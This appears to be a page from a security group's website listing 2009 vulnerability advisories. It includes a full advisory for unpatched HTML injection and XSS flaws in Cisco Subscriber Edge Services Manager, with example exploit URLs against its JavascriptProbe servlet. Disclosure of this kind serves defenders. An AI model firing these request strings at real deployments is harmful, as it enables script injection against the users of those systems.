Vuln: Cherokee Web Server 0.5.4 Denial Of Service [2009-10-25] Details

Vuln: BSR Webweaver Version 1.33 /Scripts access restriction bypass [2009-09-15] Details

Vuln: Kolibri+ Webserver 2 Multiple Vulnerabilities [2009-09-06] Details

Vuln: FUSE BUILDER XSS / HTML Injection [2009-05-16] Details

Vuln: Cisco Subscriber Edge Services Manager Multiple Vulnerabilities [2009-04-08] Details

Vuln: Motorola Wimax Modem multiple vulnerabilities [2009-01-29] Details

Web Application Security Training

19-04-2009

Usman Saeed , Xc0re's CEO , was invited by Inovative Consultants to perform a one day Training Seminar.

Xc0re's Blog

20-03-2009

Xc0re has finally started its own blog , http://www.xc0re.net/blog

Submit your material now ! ;)

23-05-2008

Send all submissions like vulnerabilities , Papers &/or any thing related to security ! at submit@xc0re.net !

Cisco Subscriber Edge Services Manager Multiple Vulnerabilities

Cisco Subscriber Edge Services Manager Multiple Vulnerabilities

Cisco Subscriber Edge Services Manager Multiple Vulnerabilities namely :

> Html Injection
> XSS

[*] Attack type : Remote

[*] Patch Status : Unpatched

[*] Exploitation :

[+] Html Injection

http://host/servlet/JavascriptProbe?prevURL=http%3A//host/servlet/JavascriptProbe%3FprevURL%3D%22%3E%3C&browser=explorer&version=6&javascript=1.3&getElementById=true&getElementTagName=true&documentElement=true&anchors=true®exp=true&option=true&all=true&cookie=true&images=true&layers=false&forms=true&links=true {HTML INJECTION} &frames=true&screen=true&

[+] XSS

http://host/servlet/JavascriptProbe?prevURL=http%3A//host/servlet/JavascriptProbe%3FprevURL%3Dhttp%253A//host/&browser=explorer&version=6&javascript=1.3&getElementById=true&getElementTagName=true&documentElement=true&anchors=true®exp=true&option=true&all=true&cookie=true&images=true&layers=false&forms=true&links=true&frames=true&screen=%20true"XSS"

Author : Usman Saeed , Xc0re Security Research Group.